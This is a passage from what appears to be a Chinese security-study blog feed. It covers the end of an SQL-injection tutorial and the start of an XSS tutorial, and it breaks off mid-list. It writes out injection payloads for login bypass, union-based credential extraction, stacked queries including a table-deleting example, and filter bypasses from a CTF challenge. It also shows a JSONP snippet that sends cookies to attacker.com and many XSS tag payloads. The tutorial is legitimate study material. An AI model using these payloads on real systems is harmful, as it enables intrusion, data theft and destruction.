<mark>%23代表#</mark>，也是注释符。</p><p>2.post型</p><p>如果是post型的话，我们可以用上面的方法进行编码，或者使用+代替空格，也可以不使用，直接像在浏览器中探测一样。</p><h2 id="三常见的注入手法"><a class="markdownIt-Anchor" href="#三常见的注入手法"></a> 三.常见的注入手法</h2><p>首先我们应该判断知道其注入类型，SQL注入按照注入点类型分类可分为三种：</p><h3 id="1数字型注入"><a class="markdownIt-Anchor" href="#1数字型注入"></a> 1.数字型注入</h3><p>SQL中的语句格式：select * from users where id =x</p><pre><code>    判断方法：使用 1 and 1=1  ，1 and 1=2 来判断    当输入：and 1=1 时页面显示正常                   select * from users where id =x and 1=1        输入：and 1=2 时页面显示异常                   select * from users where id =x and 1=2       说明是数字型注入</code></pre><h3 id="2字符型注入"><a class="markdownIt-Anchor" href="#2字符型注入"></a> 2.字符型注入</h3><p>SQL中的语句格式：select * from users where id =‘x’</p><pre><code>    判断方法：使用 1' and '1'='1  ，1' and '1'='2 来判断    当输入：1’ and ‘1’='1 时页面显示正常                   select * from users where id ='x' and '1'='1'       输入：1’ and ‘1’='2 时页面显示异常                  select * from users where id ='x' and '1'='2'      说明是字符型注入</code></pre><h3 id="3搜索型注入"><a class="markdownIt-Anchor" href="#3搜索型注入"></a> 3.搜索型注入</h3><p>基于搜索框的注入</p><pre><code>    SQL中的语句格式：select * from database.table where users like '%要查询的关键字%'   判断方法：     某个商品名称%' and 1=1 and '%'='  （这个语句的功能就相当于普通SQL注入的 and 1=1）</code></pre><p>select * from database.table where users like ‘%某个商品名称%’ and 1=1 and ‘%’=‘%’</p><pre><code>    页面显示正常     某个商品名称%' and 1=2 and '%'='  （这个语句的功能就相当于普通SQL注入的 and 1=2）</code></pre><p>select * from database.table where users like ‘%某个商品名称%’ and 1=2 and ‘%’=‘%’</p><pre><code>    页面显示异常    根据上面的返回情况来判断是否存在搜索型注入</code></pre><h2 id="四联合注入"><a class="markdownIt-Anchor" href="#四联合注入"></a> 四.联合注入</h2><p>联合注入是一种非常常用的注入方式，union select 开头的语句属于联合注入，联合注入的必要条件就是页面必须要有回显位，否则就应该考虑使用盲注（后面再展开说明）</p><p>这里我将总结部分比较常用的SQL注入语句：</p><p>首先我们先明确SQL注入的基本流程，在基础的SQL操作中通常有这样的尝试顺序：</p><p>1.先判断SQL注入类型；</p><p>2.判断闭合方式，查询字段，判断回显位；</p><p>3.爆库，爆表，爆列，爆内容。</p><p>另外，页面可能存在过滤，有时要综合考虑各种绕过方法，例如双写绕过，编码绕过等。</p><p>1).查找注入点</p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; or 1 = 1#  </span><br></pre></td></tr></table></figure><p>#可以用–+替换，有些情境#不能起作用QAQ</p><p>(这条万能语句常用于<strong>登录框</strong>之类的注入)</p><p><strong>作用：<strong>是爆出表中的</strong>所有字段</strong></p><p><strong>举例</strong>：验证用户名和密码的语句</p><p>我们在这里做出简单的解释：</p><p>页面原sql</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;select * from users where username=&#x27;$name&#x27; and password=&#x27;$pwd&#x27;&quot;;</span><br></pre></td></tr></table></figure><p>在进行上述语句后变为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;select * from users where username=&#x27;1&#x27; or 1 = 1#&#x27; and password=&#x27;$pwd&#x27;&quot;;</span><br></pre></td></tr></table></figure><p>#是注释符号，后面的内容被注释，or为或，两边一边为真就是真，由于右边1=1为真，故为真；</p><p>因此上述语句就等价于：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where username=&#x27;1&#x27; or 1 = 1</span><br></pre></td></tr></table></figure><p>2).查询字段数</p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; order by 数值--+</span><br></pre></td></tr></table></figure><p>3).判断回显位</p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1’ union select 1,2,3--+</span><br></pre></td></tr></table></figure><p>在上一步的查询字段数后我们知道了字段数，接着就根据字段数来判断，若之前找到的字段数为二，事例语句就应该改为</p><p>union select 1,2–+</p><p>4).爆破数据库名</p><p><strong>关键</strong>：<strong>database()</strong></p><p>​    根据回显位，在回显位输入所要内容对应的关键字。（例如回显位是 2，下面为事例）</p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select 1,database(),3--+   </span><br></pre></td></tr></table></figure><p>5).爆破表格名</p><p>关键：</p><p><strong>group_concat(table_name) from information_schema.tables where table_schema=database()</strong></p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+</span><br></pre></td></tr></table></figure><p>简单注释一下：</p><ul><li><p><strong>1</strong>：第一个占位列，保持列数匹配</p></li><li><p><strong>group_concat(table_name)</strong>：核心攻击代码</p><ul><li><code>group_concat()</code>：MySQL函数，将多行合并为一行</li><li><code>table_name</code>：从information_schema.tables获取表名</li></ul></li><li><p><strong>3</strong>：第三个占位列</p><ul><li><p><strong>information_schema</strong>：MySQL的系统数据库</p></li><li><p><strong>tables</strong>：存储所有数据库表信息的元数据表</p><p><code>where table_schema=database()</code></p><ul><li><strong>table_schema</strong>：筛选当前数据库</li><li><strong>database()</strong>：返回当前数据库名的函数</li></ul></li></ul></li></ul><p>由上述事例可以看出，和爆破数据库名一样的思路,都是在回显位输入所要内容对应的关键字。</p><p>【注意：如果 information_schema 被过滤了，可以使用 sys】（QAQ没用过，本人也不懂emmmmmm）</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&amp;&amp;substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),1,1)=&#x27;f&#x27;</span><br></pre></td></tr></table></figure><p>6).爆破表格字段</p><p>关键：</p><p><strong>group_concat(column_name) from information_schema.columns where table_name=‘表格名’</strong></p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select 1,group_concat(column_name),3 from information_schema.columns where table_name=&#x27;表格名&#x27;--+</span><br></pre></td></tr></table></figure><p>7).获取字段值</p><p>关键：</p><p><strong>group_concat(id,username,password) from geekuser</strong></p><p><strong>语句：</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27; union select 1,group_concat(id,username,password),3 from 表格名--+</span><br></pre></td></tr></table></figure><h2 id="二编插一嘴报错注入"><a class="markdownIt-Anchor" href="#二编插一嘴报错注入"></a> 二)编插一嘴：报错注入</h2><p>之前在尝试写一个登录注册留言板系统的时候遇到了一大堆数据库报错QAQ，然后发现这些报错都是详细到哪个文件的第几行，还给出了该文件的绝对路径emmmmmm。。。。。(绝对不是窝写的太拉吉了QAQ)</p><p>现在看到了报错注入的相关内容，遂加入。</p><p>首先：报错注入用在数据库的错误信息会回显在网页中的情况，如果联合查询不能使用，首选报错注入。</p><p>那么何为报错注入？</p><p>报错注入利用的是数据库的报错信息得到数据库的内容，这里需要构造语句让数据库报错。</p><h3 id="原理支持"><a class="markdownIt-Anchor" href="#原理支持"></a> 原理支持</h3><p>在mysql高版本（大于5.1版本）中添加了对XML文档进行查询和修改的函数：</p><p><strong>updatexml（）</strong></p><p><strong>extractvalue（）</strong></p><p>当这两个函数在执行时，如果出现xml文档路径错误就会产生报错。</p><h2 id="三编插一嘴堆叠注入"><a class="markdownIt-Anchor" href="#三编插一嘴堆叠注入"></a> 三)编插一嘴：堆叠注入</h2><p>eg.buuctf --[强网杯2019]随便注</p><p>这题的联合注入被过滤QAQ,因此采用堆叠注入。</p><h3 id="1定义"><a class="markdownIt-Anchor" href="#1定义"></a> 1.定义</h3><p>Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection</p><h3 id="2-原理"><a class="markdownIt-Anchor" href="#2-原理"></a> 2. 原理</h3><p>在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为： Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。</p><h3 id="3基本语句"><a class="markdownIt-Anchor" href="#3基本语句"></a> 3.基本语句</h3><p>以该题为例：</p><p>查询所有数据库：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;show databases;#</span><br></pre></td></tr></table></figure><p>查询所有表:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;show tables;#</span><br></pre></td></tr></table></figure><p>查询words表中所有列:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;show columns from words;#</span><br></pre></td></tr></table></figure><p>查询1919810931114514表中所有列：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;show columns from `1919810931114514`;#      (字符串为表名操作时要加反引号)</span><br></pre></td></tr></table></figure><p>找到了flag的的列，下一步就是如何让他回显出来</p><p>EXP1:</p><p>我们知道正则匹配过滤了很多字符，但是没有过滤alert和rename</p><p>①先把words表改为word1</p><p>②再利用rename将1919810931114514这个表修改为word</p><p>③再将flag字段修改成id</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;</span><br><span class="line">rename tables `words` to `words1`;</span><br><span class="line">rename tables `1919810931114514` to `words`; </span><br><span class="line">alter table `words` change `flag` `id` varchar(100);#</span><br></pre></td></tr></table></figure><p>这段代码的意思是将words表名改为words1，1919810931114514表名改为words，将现在的words表中的flag列名改为id 然后用<code>1' or 1=1 #</code>得到flag</p><p>EXP2:</p><p><strong>16进制编码绕过select 关键字</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from `1919810931114514`</span><br></pre></td></tr></table></figure><p>将上述语句进行16进制编码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;sEt@a= 0x73656c656374202a2066726f6d20603139313938313039333131313435313460;PREPARE hacker from @a;EXECUTE hacker;#</span><br></pre></td></tr></table></figure><p>EXP3:</p><p>采用预编译：</p><p>预编译相当于定一个语句相同，参数不通的<a href="https://zhida.zhihu.com/search?content_id=209402995&amp;content_type=Article&amp;match_order=1&amp;q=Mysql&amp;zd_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ6aGlkYV9zZXJ2ZXIiLCJleHAiOjE3NzIwNzU5NjQsInEiOiJNeXNxbCIsInpoaWRhX3NvdXJjZSI6ImVudGl0eSIsImNvbnRlbnRfaWQiOjIwOTQwMjk5NSwiY29udGVudF90eXBlIjoiQXJ0aWNsZSIsIm1hdGNoX29yZGVyIjoxLCJ6ZF90b2tlbiI6bnVsbH0.PAqszDHQ6TfSee-F5tFpsE4yfu2Dw1gn-jh-WVboELI&amp;zhida_source=entity">Mysql</a>模板，我们可以通过预编译的方式，绕过特定的字符过滤</p><p>格式：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">PREPARE 名称 FROM Sql语句 ? ;</span><br><span class="line">SET @x=xx;</span><br><span class="line">EXECUTE 名称 USING @x;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;PREPARE hacker from concat(&#x27;s&#x27;,&#x27;elect&#x27;, &#x27; * from `1919810931114514` &#x27;);EXECUTE hacker;#</span><br></pre></td></tr></table></figure><p>EXP4:</p><p>使用handle</p><ul><li>handle不是通用的SQL语句，是Mysql特有的，可以逐行浏览某个表中的数据，格式：</li></ul><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">打开表：</span><br><span class="line">HANDLER 表名 OPEN ;</span><br><span class="line"></span><br><span class="line">查看数据：</span><br><span class="line">HANDLER 表名 READ next;</span><br><span class="line"></span><br><span class="line">关闭表：</span><br><span class="line">HANDLER 表名 READ CLOSE;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;;HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ FIRST;HANDLER `1919810931114514` CLOSE;</span><br></pre></td></tr></table></figure><p><a href="https://www.cnblogs.com/backlion/p/9721687.html">参考文献1</a></p><p><a href="https://zhuanlan.zhihu.com/p/545713669">参考文献2</a></p><h2 id="五盲注"><a class="markdownIt-Anchor" href="#五盲注"></a> 五.盲注</h2><p>前面有提到，当页面不存在回显位时联合注入无法实现，该情况下我们可以考虑盲注~~（纯猜测）~~；</p><p>盲注是不能通过直接显示的途径来获取数据库信息。在盲注中，需要根据其返回页面的不同来判断信息（可能是页面内容的不同，也可以是响应时间不同）</p><p>盲注分为两种：布尔盲注和时间盲注。</p><h3 id="1布尔盲注"><a class="markdownIt-Anchor" href="#1布尔盲注"></a> 1.布尔盲注</h3><p>后续补充</p><h3 id="2时间盲注"><a class="markdownIt-Anchor" href="#2时间盲注"></a> 2.时间盲注</h3><p>看我干嘛QAQ</p><p>后续会补充的（大概？</p><h2 id="六延时注入"><a class="markdownIt-Anchor" href="#六延时注入"></a> 六.延时注入</h2><p>参考文章：<a href="https://blog.csdn.net/2301_79218813/article/details/135090595">https://blog.csdn.net/2301_79218813/article/details/135090595</a></p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2025/12/29/SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/</id>
    <link href="https://cl1ck-t0.github.io/2025/12/29/SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/"/>
    <published>2025-12-29T07:00:34.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>SQL注入基础</title>
    <updated>2026-03-29T06:30:37.443Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <category term="xss" scheme="https://cl1ck-t0.github.io/tags/xss/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="xss基础"><a class="markdownIt-Anchor" href="#xss基础"></a> xss基础</h1><h2 id="一xss概述"><a class="markdownIt-Anchor" href="#一xss概述"></a> 一.xss概述</h2><h3 id="1定义"><a class="markdownIt-Anchor" href="#1定义"></a> 1.定义：</h3><p>XSS（Cross Site Scripting）攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。</p><p>成因：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植 入到提供给其它用户使用的页面中，而程序对输入和输出的控制不够严格，导致“精心构造” 的脚本输入后，再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时，浏览器会解析并执行这些恶意代码。</p><p>XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过其他用户本地 浏览器执行的，所以XSS漏洞关键就是寻找参数未过滤的输出函数</p><h3 id="2xss常见危害"><a class="markdownIt-Anchor" href="#2xss常见危害"></a> 2.XSS常见危害</h3><p>网络钓鱼，盗取各类用户的账号，如机器登录帐号、用户网银帐号、各类管理员帐号。<br />窃取用户Cookie，获取用户隐私，或者利用用户身份进一步执行操作。<br />劫持用户（浏览器）会话，从而执行任意操作，例如进行非法转账、强制发表日志等。<br />强制弹出广告页面，刷流量等。<br />进行恶意操作，例如任意篡改页面信息，删除文章等，传播跨站脚本蠕虫，网页挂马等。<br />进行基于大量的客户端攻击，如DDOS攻击。<br />结合其它漏洞，如CSRF漏洞，进一步渗透网站。<br />获取客户端信息，例如用户的浏览历史、真实IP、开放端口等。<br />控制受害者机器向其他网站发起攻击。<br />传播跨站脚本蠕虫等。</p><h3 id="3xss检测方法"><a class="markdownIt-Anchor" href="#3xss检测方法"></a> 3.XSS检测方法</h3><p>在目标站点上找到输入点，比如查询接口，留言板等<br />输入一组“特殊字符+唯一标识字符”，提交查看返回的源码，是否有做对应的处理<br />通过搜索定位到特征字符，结合特征字符前后语法确定是否可以构造执行js<br />提交构造的脚本代码，查看是否可以成功执行，如果成功执行则说明存在xss漏洞</p><h4 id="xss漏洞常见位置反馈与浏览-富文本编辑器-各类标签插入和自定义-用户资料-关键词-说明-文件上传等处"><a class="markdownIt-Anchor" href="#xss漏洞常见位置反馈与浏览-富文本编辑器-各类标签插入和自定义-用户资料-关键词-说明-文件上传等处"></a> XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、 关键词、说明、文件上传等处</h4><h2 id="二分类"><a class="markdownIt-Anchor" href="#二分类"></a> 二.分类</h2><blockquote><p>[!NOTE]</p><p>分为存储型xss、反射型xss、DOM型xss</p></blockquote><p>下面我们来一一概述()</p><h3 id="1反射型xss"><a class="markdownIt-Anchor" href="#1反射型xss"></a> 1.反射型xss</h3><p>通过给别人发送带有恶意脚本代码参数的URL， 欺骗用户点击链接，当用户单击时触发，特有的恶意代码参数被HTML解析、执行， 这类跨站的代码通常不存储于服务端。</p><p>常见XSS点：网站的搜索栏、用户登录入口、输入表单等地方，漏洞点简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输岀，导致输岀的数据中存在可被浏览器执行的代码数据。</p><p>特点：非持久化，经过后端，但不存入数据库。</p><p>总而言之;</p><ul><li><strong>恶意脚本存在于URL参数中</strong></li><li><strong>通过HTTP请求立即执行，不存储在服务器</strong></li><li><strong>需要诱骗用户点击恶意链接</strong></li><li><strong>影响范围相对较小</strong></li></ul><p>eg.<s>初学还没遇见，后面再补</s>     (XssLab)</p><h3 id="2存储型xss"><a class="markdownIt-Anchor" href="#2存储型xss"></a> 2.存储型xss</h3><p>比反射型XSS更具有威胁性。恶意代码会存储在服务器中，如在 个人信息或发表文章等地方，加入恶意代码，如果没有过滤或过滤不严，那么这些代码将储存到服务 器中，每当有用户访问该页面的时候都会触发代码执行.</p><p>常见XSS点：论坛、博客、留言板、评论、日志等交互处，这些地方有个明显的特征，就是功能页面 .几乎大多数用户都能轻易看到。</p><p>区别：存储型XSS和反射型XSS利用方式完全一样。判断存储型XSS只需要重新打开当前页面，若弹 窗还是出现，说明恶意语句被存储在服务器上，即为存储型。</p><p>总而言之：</p><ul><li><ul><li><strong>恶意脚本存储在后端中(数据库、日志文件、评论等)</strong></li><li><strong>持久性攻击，影响所有访问相关页面的用户</strong></li><li><strong>危害最大，传播范围广</strong></li><li><strong>不需要用户主动触发</strong></li></ul></li></ul><p>eg.rois2025challenge“我要不停地实践你”两件套</p><h3 id="3dom型xss"><a class="markdownIt-Anchor" href="#3dom型xss"></a> 3.DOM型xss</h3><p>文档对象模型Document Object Model（DOM）是一个与平台、编程语言不相干的接口，允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果会成为展示页面的一部分</p><p>DOM型xss其实是一种特殊类型的反射型xss，也被称作本地跨站，它是基于DOM文档对象模型的一种漏洞。DOM XSS和反射型XSS、存储型XSS的区别在于DOM XSS代码并不需要服务器参与，出发XSS靠的是浏览器的DOM解析，完全是客户端的事情</p><p>DOM中有很多对象，其中一些对象可以被用户所操纵，如url，location等。客户端的脚本程序可以通过DOM来动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而是从客户端取得DOM中的数据后并在本地执行，因此仅从服务器端是没有办法防御DOM型XSS漏洞的，如若DOM中的数据没有经过严格的验证，便会产生基于DOM的XSS漏洞。</p><p>基于DOM的XSS是反射的特例，其中JavaScript隐藏在URL中，并在其呈现时由页面中的JavaScript取出，而不是在提供服务时嵌入到页面中。这可以使其比其他攻击更隐蔽，并且监控页面正文的WAF或其他防护检测不出恶意内容。</p><p>攻击方式：用户请求一个经过专门设计的URL，它由攻击者提交，而且其中包含xss代码。服务器的响应不会以任何的形式包含攻击者的脚本，当用户的浏览器处理这个响应时，DOM对象就会处理xss代码，导致存在xss漏洞。</p><p>总而言之：</p><ul><li><strong>完全在客户端执行</strong></li><li><strong>不涉及服务器端代码</strong></li><li><strong>通过JavaScript修改DOM结构触发</strong></li><li><strong>HTTP响应中不包含恶意脚本</strong></li></ul><p>eg.<s>没见过，见过再补充()</s></p><h3 id="4二编jsonp型xss"><a class="markdownIt-Anchor" href="#4二编jsonp型xss"></a> 4.二编）JSONP型XSS</h3><p>在浏览器的同源策略下，前端 JavaScript不能直接跨域请求 <code>AJAX</code>(一种无需刷新页面就能向服务器发送和接收数据的技术），但可以利用 <code>&lt;script&gt;</code> 标签(允许跨域加载特性)进行跨域请求(允许从一个域名中获取到另一个域名的数据)，从而绕过浏览器同源策略限制</p><p>后端返回的是带回调函数的 JSON 数据，前端利用回调函数<code>callback</code>解析数据</p><p>攻击者可以==<strong>伪造回调函数</strong>，利用 JSONP 执行任意 JavaScript 代码</p><p>eg.窃取受害者cookie</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=&quot;https://example.com/api?callback=evilFunction&quot;&gt;&lt;/script&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">function evilFunction(data) &#123;</span><br><span class="line">    document.write(&quot;&lt;img src=&#x27;http://attacker.com/steal?cookie=&quot; + document.cookie + &quot;&#x27;&gt;&quot;);</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure><h2 id="三xss实战"><a class="markdownIt-Anchor" href="#三xss实战"></a> 三.xss实战</h2><h3 id="1常用标签"><a class="markdownIt-Anchor" href="#1常用标签"></a> 1.常用标签</h3><h4 id="0x01-a-标签"><a class="markdownIt-Anchor" href="#0x01-a-标签"></a> 0x01. a 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onclick=eval(&quot;alert(&#x27;xss&#x27;);&quot;)&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/a&gt;</span><br></pre></td></tr></table></figure><h4 id="0x02-img标签"><a class="markdownIt-Anchor" href="#0x02-img标签"></a> 0x02. img标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;alert(1)&quot;&gt;</span><br><span class="line">&lt;img src=x onerror=eval(&quot;alert(1)&quot;)&gt;</span><br><span class="line">&lt;img src=1 onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;img src=1 onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;img src=1 onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br></pre></td></tr></table></figure><h4 id="0x03-iframe标签"><a class="markdownIt-Anchor" href="#0x03-iframe标签"></a> 0x03. iframe标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&quot;javascript:alert(1)&quot;&gt;test&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=&quot;alert(document.cookie)&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=&quot;base64,YWxlcnQoJ3hzcycpOw==&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe src=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=&quot;&gt;</span><br></pre></td></tr></table></figure><h4 id="0x04-audio-标签"><a class="markdownIt-Anchor" href="#0x04-audio-标签"></a> 0x04. &lt;audio 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio src=1 onerror=alert(1)&gt;</span><br><span class="line">&lt;audio&gt;&lt;source src=&quot;x&quot; onerror=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/audio&gt;</span><br><span class="line">&lt;audio controls onfocus=eval(&quot;alert(&#x27;xss&#x27;);&quot;) autofocus=&quot;&quot;&gt;&lt;/audio&gt;</span><br><span class="line">&lt;audio controls onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;source src=&quot;x&quot;&gt;&lt;/audio&gt;</span><br></pre></td></tr></table></figure><h4 id="0x05-video标签"><a class="markdownIt-Anchor" href="#0x05-video标签"></a> 0x05. &lt;video标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src=x onerror=alert(1)&gt;</span><br><span class="line">&lt;video&gt;&lt;source onerror=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/video&gt;</span><br><span class="line">&lt;video controls onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/video&gt;</span><br><span class="line">&lt;video controls onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;&lt;/video&gt;</span><br><span class="line">&lt;video controls onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/video&gt;</span><br></pre></td></tr></table></figure><h4 id="0x06-svg标签"><a class="markdownIt-Anchor" href="#0x06-svg标签"></a> 0x06. &lt;svg标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload=javascript:alert(1)&gt;</span><br><span class="line">&lt;svg onload=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/svg&gt;</span><br></pre></td></tr></table></figure><h4 id="0x07-button-标签"><a class="markdownIt-Anchor" href="#0x07-button-标签"></a> 0x07. button 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onclick=alert(1)&gt;</span><br><span class="line">&lt;button onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button 